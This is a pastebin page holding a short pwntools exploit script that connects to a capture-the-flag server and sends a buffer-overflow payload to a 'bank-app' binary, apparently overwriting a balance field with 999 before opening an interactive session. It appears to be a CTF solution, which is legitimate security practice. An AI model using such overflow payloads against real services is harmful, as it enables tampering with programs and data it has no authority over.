Untitled
unknown
plain_text
2 years ago
330 B
17
Indexable
from pwn import *
# io = process('./bank-app')
io = remote('challenges.pmdk.gr', 37573)
print(io.recv(timeout=5).decode())
io.send(b'\4')
print(io.recv(timeout=5).decode())
overflow = bytes(36) + (999).to_bytes(4, byteorder='little') + (5).to_bytes(1, byteorder='little')
io.send(overflow)
io.interactive()
Editor is loading...
Leave a Comment